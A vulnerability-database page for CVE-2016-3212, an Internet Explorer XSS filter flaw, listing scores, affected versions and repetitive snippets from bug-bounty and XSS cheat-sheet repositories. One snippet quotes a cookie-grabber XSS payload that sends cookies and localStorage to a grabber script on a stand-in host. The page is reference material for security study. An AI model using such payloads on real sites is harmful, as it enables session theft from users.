4.3
CVSSv2

CVE-2016-3212

Published: 16/06/2016 Updated: 12/10/2018
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
CVSS v3 Base Score: 6.1 | Impact Score: 2.7 | Exploitability Score: 2.8
VMScore: 387
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

The XSS Filter in Microsoft Internet Explorer 9 through 11 does not properly identify JavaScript, which makes it easier for remote malicious users to conduct cross-site scripting (XSS) attacks via a crafted web site, aka "Internet Explorer XSS Filter Vulnerability."

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft internet explorer 11

microsoft internet explorer 10

microsoft internet explorer 9

Github Repositories

Inspired by https://github.com/djadmin/awesome-bug-bounty, a list of bug bounty write-up that is categorized by the bug nature

Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by githubcom/djadmin/awesome-bug-bounty Introduction I have been reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type of vulnerability that I have no idea how to exploit Let say you f

web security scanning

cross-site-scripting Cross-Site Scripting wikiowasporg/indexphp/Cross-site_Scripting_(XSS) References Hacker101 - XSS Tutorial Acunetix - Cross-site Scripting (XSS) Attackl A timing attack with CSS selectors and Javascript Examples [2021] - XSS on forumsoculusvrcom leads to Oculus and Facebook account takeovers [2020] - [gitlab] - Stored XSS on PyPi simple API endp

You can also contribute with a beer IRL or with buymeacoffeecom #Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by githubcom/Muhammd/awesome-bug-bounty/ #Introduction I have reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type of

Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by githubcom/djadmin/awesome-bug-bounty Introduction I have been reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type of vulnerability that I have no idea how to exploit Let say you f

Pentesting Pemula

Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by githubcom/djadmin/awesome-bug-bounty Introduction I have been reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type of vulnerability tha I have no idea how to exploit Let say you fo

Cross Site Scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications XSS enables attackers to inject client-side scripts into web pages viewed by other users Summary Exploit code or POC Data grabber for XSS UI redressing Javascript keylogger Other ways Identify an XSS endpoint XSS in HTML/Applications Common Pay

The aim of this Reposiotry is to Provide the Resoursces of Learning at one place For Bug Bounty Hunters.

Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by githubcom/djadmin/awesome-bug-bounty Here You can find the writeups of all the bugs that was awesome XSSI Cross-Site Scripting (XSS) Brute Force SQL Injection (SQLi) External XML Entity Attack (XXE) Remote Code Execution (RCE) Deserialization Image Tragick

Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by githubcom/djadmin/awesome-bug-bounty Introduction I have been reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type of vulnerability that I have no idea how to exploit Let say you f

An ongoing & curated collection of awesome software best practices and techniques, libraries and frameworks, E-books and videos, websites, blog posts, links to github Repositories, technical guidelines and important resources about Bug Bounty in Cybersecurity.

Bug Bounty Testing, Techniques, and Tools An ongoing & curated collection of awesome software best practices and techniques, libraries and frameworks, E-books and videos, websites, blog posts, links to github Repositories, technical guidelines and important resources about Bug Bounty in Cybersecurity Thanks to all contributors, you're awesome and wouldn't be

The aim of this Reposiotry is to Provide the Resoursces of Learning at one place For Bug Bounty Hunters.

Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by githubcom/djadmin/awesome-bug-bounty Here You can find the writeups of all the bugs that was awesome XSSI Cross-Site Scripting (XSS) Brute Force SQL Injection (SQLi) External XML Entity Attack (XXE) Remote Code Execution (RCE) Deserialization Image Tragick

Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by githubcom/djadmin/awesome-bug-bounty Introduction I have been reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type of vulnerability that I have no idea how to exploit Let say you f

Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by githubcom/djadmin/awesome-bug-bounty Introduction Follow my Twitter @ngalongc I have been reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type of vulnerability tha I have no idea ho

Cross Site Scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications XSS enables attackers to inject client-side scripts into web pages viewed by other users Summary Cross Site Scripting Summary Exploit code or POC Data grabber for XSS CORS UI redressing Javascript keylogger Other ways Identify an XSS endpoint

Basic XSS [Cross Site Scripting]

XSS [IT WORLD ID] Data grabber XSS Mendapatkan cookie administrator atau token akses sensitif, muatan berikut akan mengirimkannya ke halaman yang dikontrol <script>documentlocation='localhost/XSS/grabberphp?c='+documentcookie</script> <script>documentlocation='localhost/XSS/grabberphp?c='+localSt

Pentesting Pemula

Bug Bounty Reference A list of bug bounty write-up that is categorized by the bug nature, this is inspired by githubcom/djadmin/awesome-bug-bounty Introduction I have been reading for Bug Bounty write-ups for a few months, I found it extremely useful to read relevant write-up when I found a certain type of vulnerability tha I have no idea how to exploit Let say you fo